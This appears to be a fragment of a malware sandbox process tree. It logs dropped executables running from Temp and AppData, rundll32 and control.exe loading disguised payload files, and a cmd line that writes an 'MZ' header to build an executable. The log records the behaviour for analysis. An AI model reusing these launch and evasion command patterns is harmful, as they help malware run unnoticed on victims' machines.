C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"9⤵PID:3644
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\zyl-game.exe"C:\Users\Admin\AppData\Local\Temp\zyl-game.exe"7⤵PID:1680
-
-
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe"7⤵PID:2864
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun159ff1acacf.exe4⤵
- Loads dropped DLL
PID:1992
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zS465B9016\Sun159ff1acacf.exeSun159ff1acacf.exe1⤵
- Executes dropped EXE
PID:568 -
C:\Users\Admin\AppData\Local\Temp\7zS465B9016\Sun159ff1acacf.exeC:\Users\Admin\AppData\Local\Temp\7zS465B9016\Sun159ff1acacf.exe2⤵PID:2088
-
-
C:\Users\Admin\AppData\Local\Temp\7zS465B9016\Sun159ff1acacf.exeC:\Users\Admin\AppData\Local\Temp\7zS465B9016\Sun159ff1acacf.exe2⤵PID:2572
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\R6f7sE.I1⤵PID:1860
-
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\R6f7sE.I2⤵PID:568
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\R6f7sE.I3⤵PID:2840
-
-
-
C:\Windows\SysWOW64\rundll32.exerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵PID:3344
-
C:\Windows\system32\rUNdlL32.eXerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:3336
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService1⤵PID:3400
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SeT /p = "MZ" 1>4~T6.Kj6"1⤵PID:4000
-
C:\Windows\SysWOW64\control.execontrol ..\kZ_AmsXL.6G1⤵PID:4016
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL ..\kZ_AmsXL.6G2⤵PID:4048
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" eCHo "1⤵PID:3992
-
C:\Windows\system32\taskeng.exetaskeng.exe {0B52BBB4-8B71-4353-9E3E-CD8687C36ED8} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]1⤵PID:8220